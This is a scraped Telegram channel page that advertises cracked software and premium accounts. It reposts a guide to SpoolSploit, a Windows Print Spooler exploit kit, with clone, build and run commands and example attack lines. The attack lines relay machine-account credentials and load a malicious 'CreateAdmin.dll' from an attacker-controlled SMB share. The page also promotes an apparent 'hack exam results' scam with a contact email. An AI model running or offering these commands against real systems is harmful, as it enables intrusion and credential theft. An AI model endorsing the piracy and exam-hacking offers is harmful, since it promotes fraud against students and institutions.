Get Mystery Box with random crypto!

𝐋𝐔𝐂𝐈𝐅𝐄𝐑'𝐒-𝐖𝐎𝐑𝐋𝐃

Logo of telegram channel luciferworld77 — 𝐋𝐔𝐂𝐈𝐅𝐄𝐑'𝐒-𝐖𝐎𝐑𝐋𝐃 𝐋
Logo of telegram channel luciferworld77 — 𝐋𝐔𝐂𝐈𝐅𝐄𝐑'𝐒-𝐖𝐎𝐑𝐋𝐃
Channel address: @luciferworld77
Categories: Uncategorized
Language: English
Subscribers: 5
Description from channel

YouTube:- bit.ly/TheInvisibleWorld ️Pᴀɪᴅ Sᴏғᴛᴡᴀʀᴇ's Aɴᴅ Aᴘᴘs ️Tips & Tricks ️Pᴀɪᴅ/Mod/Cracked Sᴏғᴛᴡᴀʀᴇ's Aɴᴅ Aᴘᴘs ️Premium Accounts & Aᴘᴘs For Educational Purposes Powered By:- @LuciferWorld7 Enjoy

Ratings & Reviews

4.67

3 reviews

Reviews can be left only by registered users. All reviews are moderated by admins.

5 stars

2

4 stars

1

3 stars

0

2 stars

0

1 stars

0


The latest Messages 6

2021-10-07 14:33:23 Getting Started
As of the release date the SpoolSploit Docker container (https://www.kitploit.com/search/label/Container) has been tested successfully on the latest versions of MacOS, Ubuntu Linux, and Windows 10.Although not required, if you would like to host malicious DLLs or conduct credential relay attacks, all within the SpoolSploit container, you should ensure port 445 is not in use on the host running Docker. This is most prevalent when running this container on a Windows host, as it uses port 445 by default. If disabling port 445 on your host is not practical, that is okay! You can simply run the docker container in a virtual machine (https://www.kitploit.com/search/label/Virtual%20Machine) that has the network adapter configured in bridge mode. This will allow for serving malicious DLLs and relay credentials. If you only want to serve malicious DLLs, you could simply host the DLLs on an anonymous access share on your host OS or a compromised server share.
Create and access the SpoolSploit Docker container
Clone this repositorygit clone https://github.com/BeetleChunks/SpoolSploit
Build the SpoolSploit Docker container imagecd SpoolSploit
sudo docker build -t spoolsploit .
Create and start the SpoolSploit Docker containersudo docker run -dit -p 445:445 name spoolsploit spoolsploit:latest
Attach to the containersudo docker exec -it spoolsploit /bin/bash

Command-line Usage
) -rP {139,445},
rport {139,445} Remote SMB server port. -lH LHOST, lhost LHOST Listening hostname or IP -lS LSHARE, lshare LSHARE Staging SMB share (UNC) -d DOMAIN, domain DOMAIN Domain for authentication -u USER, username USER Username for authentication -p PASSWD, password PASSWD Password for authentication Example - spoolsample: python3 spool_sploit.py -a spoolsample -lH 10.14.1.24 -d evil.corp -u rjmcdow -p 'P4ssword123!' -rP 445 -rH 10.5.1.10 Example - nightmare: python3 spool_sploit.py -a nightmare -lS '\\10.14.1.24\C$\CreateAdmin.dll' -d evil.corp -u rjmcdow -p 'P4ssword123!' -rP 445 -rH 10.5.1.10 ">usage: spool_sploit.py [-h] -a {spoolsample,nightmare} -rH RHOST -rP {139,445} [-lH LHOST] [-lS LSHARE] -d DOMAIN -u USER -p PASSWD

optional arguments:
-h,
help show this help message and exit
-a {spoolsample,nightmare}, attack {spoolsample,nightmare}
Attack type to execute on target(s).
-rH RHOST,
rhost RHOST
Remote target IP, CIDR range, or filename (file:)
-rP {139,445}, rport {139,445}
Remote SMB server port.
-lH LHOST,
lhost LHOST
Listening hostname or IP
-lS LSHARE, lshare LSHARE
Staging SMB share (UNC)
-d DOMAIN,
domain DOMAIN
Domain for authentication
-u USER, username USER
Username for authentication
-p PASSWD,
password PASSWD
Password for authentication

Example - spoolsample:
python3 spool_sploit.py -a spoolsample -lH 10.14.1.24 -d evil.corp -u rjmcdow -p 'P4ssword123!' -rP 445 -rH 10.5.1.10

Example - nightmare:
python3 spool_sploit.py -a nightmare -lS '\\10.14.1.24\C$\CreateAdmin.dll' -d evil.corp -u rjmcdow -p 'P4ssword123!' -rP 445 -rH 10.5.1.10

SpoolSample - Capture and relay Windows machine account credentials
The SpoolSploit Docker container includes Responder (https://github.com/lgandx/Responder) for relaying machine account hashes obtained from executing the spoolsample attack in SpoolSploit. As several great articles exist detailing the process of relaying privileged machine account credentials for privilege escalation, I will not go into those details here.
3 viewsChannel Automatic NS bot, 11:33
Open / Comment
2021-10-07 14:33:17
•.¸♡ [#AnonymousDeviL ] ♡¸.•
2 viewsChannel Automatic NS bot, edited  11:33
Open / Comment
2021-10-07 14:33:16 •.¸♡ [#AnonymousDeviL ] ♡¸.•

SpoolSploit - A Collection Of Windows Print Spooler Exploits Containerized With Other Utilities For Practical Exploitation
http://www.kitploit.com/2021/10/spoolsploit-collection-of-windows-print.html
2 viewsChannel Automatic NS bot, edited  11:33
Open / Comment
2021-10-07 14:33:16
•.¸♡ [#AnonymousDeviL ] ♡¸.•
2 viewsChannel Automatic NS bot, edited  11:33
Open / Comment
2021-10-05 06:31:22 Hacking on Medium
HOW TO HACK EXAM RESULTS?

https://cdn-images-1.medium.com/max/1080/1*eOVlWqgM_EIpNRvnQcljCg.png
MAGICFINGERHACKERS@GMAIL.COM — — Are you a University or college student? If the answer to this question is yes, then it might be possible…

Continue reading on Medium »
6 viewsChannel Automatic NS bot, 03:31
Open / Comment